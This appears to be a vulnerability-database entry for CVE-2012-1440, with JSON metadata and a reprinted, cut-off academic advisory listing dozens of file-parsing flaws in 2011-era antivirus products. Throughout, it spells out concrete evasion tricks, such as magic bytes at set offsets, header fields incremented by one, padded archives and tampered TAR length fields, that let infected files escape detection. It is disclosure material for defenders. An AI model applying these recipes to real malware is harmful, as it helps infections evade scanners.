Affected products - Comodo 7425
CVE no - CVE-2012-1437
- Specially crafted infected MS Office files with "ustar" at offset 257 evades detection.
Affected products - Comodo 7425, Sophos 4.61.0
CVE no - CVE-2012-1438
- 'padding' field in ELF files is parsed incorrectly. If an infected ELF file's padding field is incremented by 1 it evades detection.
Affected products - eSafe 7.0.17.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7
CVE no - CVE-2012-1439
- 'identsize' field in ELF files is parsed incorrectly.
If an infected ELF file's identsize field is incremented by 1 it evades
detection. 'e_ip' and 'e_res' field in MS EXE files are parsed incorrectly.
If any of these fields in an infected MS EXE file is incremented by 1 it evades detection.
Affected products - Prevx 3.0
'e_minalloc', 'e_res2','e_cparhdr', 'e_crlc', 'e_lfarlc','e_maxalloc',
'e_oeminfo', 'e_ovno', 'e_cs', 'e_csum','e_sp', 'e_ss', 'e_cblp' and
'e_oemid' fields in MS EXE files are parsed incorrectly.
If any of these fields in an infected MS EXE file is incremented by 1
it evades detection.
Affected products - eSafe 7.0.017.0, Prevx 3.0
CVE no - CVE-2012-1441
- 'class' field in ELF files is parsed incorrectly.
Affected products - CAT-QuickHeal 11.00, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, eSafe 7.0.017.0, Kaspersky 7.0.0.125, F-Secure 9.0.16160.0, Sophos 4.61.0, Antiy-AVL 2.0.3.7, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7
CVE no - CVE-2012-1442
- Infected RAR files with initial two bytes set to 'MZ' can be fixed by the user and correctly extracted. Such a file evades detection.
Affected products - ClamAV 0.96.4, Rising 22.83.00.03, CAT-QuickHeal 11.00, GData 21, Symantec 20101.3.0.103, Command 5.2.11.5, Ikarus T3.1.1.97.0, Emsisoft 5.1.0.1, PCTools 7.0.3.5, F-Prot 4.6.2.117, VirusBuster 13.6.151.0, Fortinent 4.2.254.0, Antiy-AVL 2.0.3.7, K7AntiVirus 9.77.3565, TrendMicro-HouseCall 9.120.0.1004,Kaspersky 7.0.0.125 Jiangmin 13.0.900. Microsoft 1.6402, Sophos 4.61.0, NOD32 5795, AntiVir 7.11.1.163, Norman 6.06.12, McAfee 5.400.0.1158, Panda 10.0.2.7, McAfee-GW-Edition 2010.1C, TrendMicro 9.120.0.1004, Comodo 7424, BitDefender 7.2, eSafe 7.0.17.0, F-Secure 9.0.16160.0 nProtect 2011-01-17.01, AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, Avast 4.8.1351.0, Avast5 5.0.677.0, VBA32 3.12.14.2
CVE no - CVE-2012-1443
- 'abiversion' field in ELF files is parsed incorrectly.
If an infected ELF file's abiversion field is incremented by 1 it evades detection.
Affected products - eSafe 7.0.017.0, Prevx 3.0, Fortinet 4.2.254.0, Panda 10.0.2.7
CVE no - CVE-2012-1444
- 'abi' field in ELF files is parsed incorrectly.
If an infected ELF file's abi field is incremented by 1 it evades detection.
Affected products - eSafe 7.0.017.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7
CVE no - CVE-2012-1445
- 'encoding' field in ELF files is parsed incorrectly.
If an infected ELF file's encoding field is incremented by 1 it evades detection. 'e_version' field in ELF files is parsed incorrectly.
If an infected ELF file's e_version field is incremented by 1 it evades detection.
Affected products - Fortinet 4.2.254.0, eSafe 7.0.017.0, DrWeb 5.0.2.03300, Panda 10.0.2.7
CVE no - CVE-2012-1447
- 'cbCabinet' field in CAB files is parsed incorrectly.
If an infected CAB file's cbCabinet field is incremented by 1 it evades detection.
Affected products - CAT-QuickHeal 11.00, TrendMicro 9.120.0.1004, Ikarus T3.1.1.97.0 TrendMicro-HouseCall 9.120.0.1004, Emsisoft 5.1.0.1
CVE no - CVE-2012-1448
- 'vMajor' field in CAB files is parsed incorrectly.
If an infected CAB file's vMajor field is incremented by 1 it evades detection.
Affected products - NOD32 5795, Rising 22.83.00.03
CVE no - CVE-2012-1449
- 'reserved3' field in CAB files is parsed incorrectly.
If an infected CAB file's reserved field is incremented by 1 it evades detection.
Affected products - Emsisoft 5.1.0.1, Sophos 4.61.0, Ikarus T3.1.1.97.0
CVE no - CVE-2012-1450
- 'reserved2' field in CAB files is parsed incorrectly.
If an infected CAB file's reserved2 field is incremented by 1 it evades detection.
Affected products - Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0
CVE no - CVE-2012-1451
- 'reserved1' field in CAB files is parsed incorrectly.
If an infected CAB file's reserved field is incremented by 1 it evades detection.
Affected products - Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, CAT-QuickHeal 11.00
CVE no - CVE-2012-1452
- 'coffFiles' field in CAB files is parsed incorrectly.
If an infected CAB file's coffFiles field is incremented by 1 it evades detection.
Affected products - McAfee 5.0.2.03300, TrendMicro-HouseCall 9.120.0.1004, Kaspersky 7.0.0.125, Sophos 4.61.0, TrendMicro 9.120.0.1004, McAfee-GW-Edition 2010.1C, Emsisoft 5.1.0.1, eTrust-Vet 36.1.8511, Antiy-AVL 2.0.3.7, Microsoft 1.6402, Rising 22.83.00.03, Ikarus T3.1.1.97.0, Fortinet 4.2.254.0, Panda 10.0.2.7
CVE no - CVE-2012-1453
- 'ei_version' field in ELF files is parsed incorrectly.
If an infected ELF file's version field is incremented by 1 it evades detection.
Affected products - McAfee 5.0.02.03300, eSafe 7.0.17.0, McAfee-GW-Edition 2010.1C, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7
CVE no - CVE-2012-1454
- 'vMinor' field in CAB files is parsed incorrectly.
If an infected CAB file's version field is incremented by 1 it evades detection.
Affected products - NOD32 5795, Rising 22.83.00.03
CVE no - CVE-2012-1455
- A specially crafted ZIP file, created by concatenating the contents of a clean TAR archive and a virus-infected ZIP archive, is parsed incorrectly and evades detection. If the length field in the header of a file with test EICAR virus included into a TAR archive is set to be greater than the archive's total length (1,000,000+original length in our experiments), the antivirus declares the file to be clean but virus gets extracted correctly by the GNU tar program.
Affected products - AntiVir 7.11.1.163, Antiy-AVL 2.0.3.7, Avast 4.8.1351.0, Avast5 5.0.677.0, AVG 10.0.0.1190, BitDefender 7.2, CAT-QuickHeal 11.00, ClamAV 0.96.4, Command 5.2.11.5, Emsisoft 5.1.0.1, eSafe 7.0.17.0, F-Prot 4.6.2.117, GData 21, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, Microsoft 1.6402, NOD32 5795, Norman 6.06.12, PCTools 7.0.3.5, Rising 22.83.00.03, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2, VirusBuster 13.6.151.0
CVE no - CVE-2012-1457
- A Windows Compiled HTML Help (CHM) file is a set of HTML files, scripts, and images compressed using the LZX algorithm. For faster random accesses, the algorithm is reset at intervals instead of compressing the entire file as a single stream. The length of each interval is specified in the LZXC header.
If an infected CHM file's header modified so that the reset interval is lower than in the original file, the antivirus declares the file to be clean. But the Windows CHM viewer hh.exe correctly decompresses the infected content located before the tampered header.
Affected products - ClamAV 0.96.4, Sophos 4.61.0
CVE no - CVE-2012-1458
- In a POSIX TAR archive, each member file has a 512-byte header protected by a simple checksum. Every header also contains a file length field, which is used by the extractor to locate the next header in the archive.
If a TAR archive contains two files: the first one is clean, while the second is infected with test EICAR virus - and it is modified such that the length field in the header of the first, clean file to point into the middle of the header of the second, infected file. The antivirus declares the file to be clean but virus gets extracted correctly by the GNU tar program.
Affected products - AhnLab-V3 2011.01.18.00, AntiVir 7.11.1.163, Antiy-AVL 2.0.3.7, Avast 4.8.1351.0, Avast5 5.0.677.0, AVG 10.0.0.1190, BitDefender 7.2, CAT-QuickHeal 11.00, ClamAV 0.96.4, Command 5.2.11.5, Comodo 7424, Emsisoft 5.1.0.1, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, Fortinent 4.2.254.0, GData 21, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, Microsoft 1.6402, NOD32 5795, Norman 6.06.12, nProtect 2011-01-17.01, Panda 10.0.2.7, PCTools 7.0.3.5, Rising 22.83.00.03, Sophos 4.61.0, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2, VirusBuster 13.6.151.0
CVE no - CVE-2012-1459
- If an infected tar.gz archive is appended 6 random bytes at the end, the antivirus declares the file to be clean but virus gets extracted by the gunzip+tar programs correctly by ignoring these bytes.
Affected products - Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Command 5.2.11.5, eSafe 7.0.17.0, F-Prot 4.6.2.117, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, VBA32 3.12.14.2
CVE no - CVE-2012-1460
- GZIP files can contain multiple compressed streams, which are assembled when the contents are extracted. If an infected .tar.gz file is broken into two streams, the antivirus declares the infected .tar.gz file to be clean while tar+gunzip extract the virus correctly
Affected products - AVG 10.0.0.1190, BitDefender 7.2, Command 5.2.11.5, Emsisoft 5.1.0.1, F-Secure 9.0.16160.0, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, NOD32 5795, Norman 6.06.12, Rising 22.83.00.03, Sophos 4.61.0, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2
CVE no - CVE-2012-1461
- If an infected ZIP archive is prepended with 1024 random bytes at the beginning, the antivirus declares the file to be clean but virus gets extracted by the unzip program correctly by skipping these bytes
Affected products - AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, CAT-QuickHeal 11.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, Kaspersky 7.0.0.125, Norman 6.06.12, Sophos 4.61.0, Symantec 20101.3.0.103
CVE no - CVE-2012-1462
- In most ELF files, the 5th byte of the header indicates endianness: 01 for little-endian, 02 for bigendian. Linux kernel, however, does not check this field before loading an ELF file. If an infected ELF file's 5-th byte is set to 02, the antivirus declares the file to be clean but the ELF file gets executed correctly.
Affected products - AhnLab-V3 2011.01.18.00, BitDefender 7.2, CAT-QuickHeal 11.00, Command 5.2.11.5, Comodo 7424, eSafe 7.0.17.0, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, McAfee 5.400.0.1158, Norman 6.06.12, nProtect 2011-01-17.01, Panda 10.0.2.7
CVE no - CVE-2012-1463
Credits
Vulnerabilities found and advisory written by Suman Jana and Vitaly Shmatikov.
References
"Abusing File Processing in Malware Detectors for Fun and Profit" by Suman Jana and Vitaly Shmatikov To appear in IEEE Symposium on Security and Privacy 2012 http://www.ieee-security.org/TC/SP2012/
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201203-0400",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "etrust vet antivirus",
"scope": "eq",
"trust": 1.8,
"vendor": "ca",
"version": "36.1.8511"
},
{
"model": "esafe",
"scope": "eq",
"trust": 1.8,
"vendor": "aladdin",
"version": "7.0.17.0"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 1.8,
"vendor": "fortinet",
"version": "4.2.254.0"
},
{
"model": "panda antivirus",
"scope": "eq",
"trust": 1.6,
"vendor": "pandasecurity",
"version": "10.0.2.7"
},
{
"model": "antivirus \\\u0026 antispyware",
"scope": "eq",
"trust": 1.0,
"vendor": "norman",
"version": "6.06.12"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.8,
"vendor": "norman",
"version": "6.06.12"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.8,
"vendor": "panda security",
"version": "10.0.2.7"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "panda",
"version": "10.0.27"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "norman",
"version": "6.6.12"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "esafe",
"version": "7.0.170"
},
{
"model": "associates etrust vet antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "36.1.8511"
}
],
"sources": [
{
"db": "BID",
"id": "52595"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001875"
},
{
"db": "CNNVD",
"id": "CNNVD-201203-404"
},
{
"db": "NVD",
"id": "CVE-2012-1440"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:ca:etrust_vet_antivirus",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:norman:norman_antivirus_%26_antispyware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:pandasecurity:panda_antivirus",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:aladdin:esafe",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:fortinet:fortinet_antivirus",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-001875"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Suman Jana and Vitaly Shmatikov",
"sources": [
{
"db": "BID",
"id": "52595"
}
],
"trust": 0.3
},
"cve": "CVE-2012-1440",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2012-1440",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-54721",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2012-1440",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2012-1440",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201203-404",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-54721",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-54721"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001875"
},
{
"db": "CNNVD",
"id": "CNNVD-201203-404"
},
{
"db": "NVD",
"id": "CVE-2012-1440"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The ELF file parser in Norman Antivirus 6.06.12, eSafe 7.0.17.0, CA eTrust Vet Antivirus 36.1.8511, Fortinet Antivirus 4.2.254.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an ELF file with a modified identsize field. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different ELF parser implementations. CVE May be split intoChanged by a third party identsize Have fields ELF Via files, malware detection can be bypassed. \nSuccessful exploits will allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection. Multiple file-parsing vulnerabilities leading to evasion in different antivirus(AV) products. All \naffected products are command-line versions of \nthe AVs. \n\n----------------------------\nVulnerability Descriptions\n----------------------------\n\n1. Specially crafted infected POSIX TAR files with \"[aliases]\" as first 9 bytes \n evades detection. \n\n Affected products -\n ClamAV 0.96.4, CAT-QuickHeal 11.00\n \n CVE no - \n CVE-2012-1419\n\n2. Specially crafted infected POSIX TAR files with \"\\7fELF\" as first 4 bytes \n evades detection. Specially crafted infected POSIX TAR files with \"MSCF\" as first 4 bytes \n evades detection. \n\n Affected products -\n CAT-QuickHeal 11.00, Norman 6.06.12, Rising 22.83.00.03, \n Symantec 20101.3.0.103\n\n CVE no - \n CVE-2012-1421\n\n4. Specially crafted infected POSIX TAR files with \"ITSF\" as first 4 bytes \n evades detection. \n\n Affected products -\n CAT-QuickHeal 11.00, NOD32 5795, Norman 6.06.12, Rising 22.83.00.03\n\n CVE no - \n CVE-2012-1422\n\n5. Specially crafted infected POSIX TAR files with \"MZ\" as first 2 bytes \n evades detection. \n\n Affected products -\n Command 5.2.11.5, Emsisoft 5.1.0.1, F-Prot 4.6.2.117, Fortinent 4.2.254.0, \n Ikarus T3.1.1.97.0, K7AntiVirus 9.77.3565, NOD32 5795, Norman 6.06.12, \n PCTools 7.0.3.5, Rising 22.83.00.03, VirusBuster 13.6.151.0\n\n CVE no - \n CVE-2012-1423\n\n6. Specially crafted infected POSIX TAR files with \"\\19\\04\\00\\10\" at offset 8\n evades detection. \n\n Affected products -\n Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Jiangmin 13.0.900, Norman 6.06.12, \n PCTools 7.0.3.5, Sophos 4.61.0\n\n CVE no - \n CVE-2012-1424\n\n\n7. Specially crafted infected POSIX TAR files with \"\\50\\4B\\03\\04\" as the first\n 4 bytes evades detection. Specially crafted infected POSIX TAR files with \"\\42\\5A\\68\" as the first\n 3 bytes evades detection. \n\n Affected products -\n CAT-QuickHeal 11.00, Command 5.2.11.5, F-Prot 4.6.2.117, \n K7AntiVirus 9.77.3565, Norman 6.06.12, Rising 22.83.00.03\n\n CVE no - \n CVE-2012-1426\n\n\n9. Specially crafted infected POSIX TAR files with \"\\57\\69\\6E\\5A\\69\\70\" at \n offset 29 evades detection. \n\n Affected products -\n CAT-QuickHeal 11.00, Norman 6.06.12, Sophos 4.61.0\n\n CVE no - \n CVE-2012-1427\n\n10. Specially crafted infected POSIX TAR files with \"\\4a\\46\\49\\46\" at offset 6\n evades detection. \n \n Affected products -\n CAT-QuickHeal 11.00, Norman 6.06.12, Sophos 4.61.0\n\n CVE no - \n CVE-2012-1428\n\n11. \n\n Affected products -\n BitDefender 7.2, Comodo 7424, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n F-Secure 9.0.16160.0, Ikarus T3.1.1.97.0, McAfee 5.400.0.1158, \n McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01 \n\n CVE no - \n CVE-2012-1429\n12. \n\n Affected products -\n BitDefender 7.2, Comodo 7424, eSafe 7.0.17.0, F-Secure 9.0.16160.0, \n McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01, \n Sophos 4.61.0, Rising 22.83.00.03\n\n CVE no - \n CVE-2012-1430\n13. \n\n Affected products -\n BitDefender 7.2, Command 5.2.11.5, Comodo 7424, eSafe 7.0.17.0, \n F-Prot 4.6.2.117, F-Secure 9.0.16160.0, McAfee-GW-Edition 2010.1C, \n nProtect 2011-01-17.01, Sophos 4.61.0, Rising 22.83.00.03\n\n CVE no - \n CVE-2012-1431\n\n14. Specially crafted infected MS EXE files with \"\\57\\69\\6E\\5A\\69\\70\" at offset\n 29 evades detection. \n\n Affected products -\n Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1432\n\n15. Specially crafted infected MS EXE files with \"\\4a\\46\\49\\46\" at offset\n 6 evades detection. \n\n Affected products -\n AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1433\n\n16. Specially crafted infected MS EXE files with \"\\19\\04\\00\\10\" at offset\n 8 evades detection. \n\n Affected products -\n AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, \n Panda 10.0.2.7\n \n CVE no - \n CVE-2012-1434\n\n17. Specially crafted infected MS EXE files with \"\\50\\4B\\4C\\49\\54\\45\" at \n offset 30 evades detection. \n \n Affected products - \n AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1435\n\n18. Specially crafted infected MS EXE files with \"\\2D\\6C\\68\" at \n offset 2 evades detection. \n \n Affected products - \n AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1436\n\n19. Specially crafted infected MS Office files with \"\\50\\4B\\53\\70\\58\" at \n offset 526 evades detection. \n \n Affected products - \n Comodo 7425\n \n CVE no - \n CVE-2012-1437\n\n20. Specially crafted infected MS Office files with \"ustar\" at \n offset 257 evades detection. \n\n Affected products - \n Comodo 7425, Sophos 4.61.0 \n\n CVE no - \n CVE-2012-1438\n\n21. \u0027padding\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s padding field is incremented by 1 it evades\n detection. \n\n Affected products - \n eSafe 7.0.17.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1439\n\n22. \u0027identsize\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s identsize field is incremented by 1 it evades\n detection. \u0027e_ip\u0027 and \u0027e_res\u0027 field in MS EXE files are parsed incorrectly. \n If any of these fields in an infected MS EXE file is incremented by 1 \n it evades detection. \n\n Affected products - \n Prevx 3.0\n\n \u0027e_minalloc\u0027, \u0027e_res2\u0027,\u0027e_cparhdr\u0027, \u0027e_crlc\u0027, \u0027e_lfarlc\u0027,\u0027e_maxalloc\u0027,\n \u0027e_oeminfo\u0027, \u0027e_ovno\u0027, \u0027e_cs\u0027, \u0027e_csum\u0027,\u0027e_sp\u0027, \u0027e_ss\u0027, \u0027e_cblp\u0027 and \n \u0027e_oemid\u0027 fields in MS EXE files are parsed incorrectly. \n If any of these fields in an infected MS EXE file is incremented by 1 \n it evades detection. \n\n Affected products - \n eSafe 7.0.017.0, Prevx 3.0\n\n\n CVE no - \n CVE-2012-1441\n\n24. \u0027class\u0027 field in ELF files is parsed incorrectly. \n\n Affected products - \n CAT-QuickHeal 11.00, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, \n eSafe 7.0.017.0, Kaspersky 7.0.0.125, F-Secure 9.0.16160.0, \n Sophos 4.61.0, Antiy-AVL 2.0.3.7, Rising 22.83.00.03, Fortinet 4.2.254.0, \n Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1442\n\n25. Infected RAR files with initial two bytes set to \u0027MZ\u0027 can be fixed by the \n user and correctly extracted. Such a file evades detection. \n \n Affected products -\n ClamAV 0.96.4, Rising 22.83.00.03, CAT-QuickHeal 11.00, GData 21, \n Symantec 20101.3.0.103, Command 5.2.11.5, Ikarus T3.1.1.97.0, \n Emsisoft 5.1.0.1, PCTools 7.0.3.5, F-Prot 4.6.2.117, \n VirusBuster 13.6.151.0, Fortinent 4.2.254.0, Antiy-AVL 2.0.3.7, \n K7AntiVirus 9.77.3565, TrendMicro-HouseCall 9.120.0.1004,Kaspersky 7.0.0.125 \n Jiangmin 13.0.900. Microsoft 1.6402, Sophos 4.61.0, NOD32 5795, AntiVir 7.11.1.163, \n Norman 6.06.12, McAfee 5.400.0.1158, Panda 10.0.2.7, McAfee-GW-Edition 2010.1C, \n TrendMicro 9.120.0.1004, Comodo 7424, BitDefender 7.2, eSafe 7.0.17.0, F-Secure 9.0.16160.0\n nProtect 2011-01-17.01, AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, Avast 4.8.1351.0, \n Avast5 5.0.677.0, VBA32 3.12.14.2 \n\n CVE no - \n CVE-2012-1443\n\n26. \u0027abiversion\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s abiversion field is incremented by 1 it evades\n detection. \n\n Affected products - \n eSafe 7.0.017.0, Prevx 3.0, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1444\n\n27. \u0027abi\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s abi field is incremented by 1 it evades\n detection. \n\n Affected products - \n eSafe 7.0.017.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1445\n\n28. \u0027encoding\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s encoding field is incremented by 1 it evades\n detection. \u0027e_version\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s e_version field is incremented by 1 it evades\n detection. \n\n Affected products -\n Fortinet 4.2.254.0, eSafe 7.0.017.0, DrWeb 5.0.2.03300, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1447\n\n30. \u0027cbCabinet\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s cbCabinet field is incremented by 1 it evades\n detection. \n\n Affected products -\n CAT-QuickHeal 11.00, TrendMicro 9.120.0.1004, Ikarus T3.1.1.97.0\n TrendMicro-HouseCall 9.120.0.1004, Emsisoft 5.1.0.1 \n\n CVE no - \n CVE-2012-1448\n\n31. \u0027vMajor\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s vMajor field is incremented by 1 it evades\n detection. \n\n Affected products -\n NOD32 5795, Rising 22.83.00.03\n \n CVE no - \n CVE-2012-1449\n\n32. \u0027reserved3\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s reserved field is incremented by 1 it evades\n detection. \n\n Affected products -\n Emsisoft 5.1.0.1, Sophos 4.61.0, Ikarus T3.1.1.97.0\n \n CVE no - \n CVE-2012-1450\n\n33. \u0027reserved2\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s reserved2 field is incremented by 1 it evades\n detection. \n\n Affected products -\n Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0\n \n CVE no - \n CVE-2012-1451\n\n34. \u0027reserved1\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s reserved field is incremented by 1 it evades\n detection. \n\n Affected products -\n Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, CAT-QuickHeal 11.00\n \n CVE no - \n CVE-2012-1452\n\n35. \u0027coffFiles\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s coffFiles field is incremented by 1 it evades\n detection. \n\n Affected products -\n McAfee 5.0.2.03300, TrendMicro-HouseCall 9.120.0.1004, Kaspersky 7.0.0.125, \n Sophos 4.61.0, TrendMicro 9.120.0.1004, McAfee-GW-Edition 2010.1C,\n 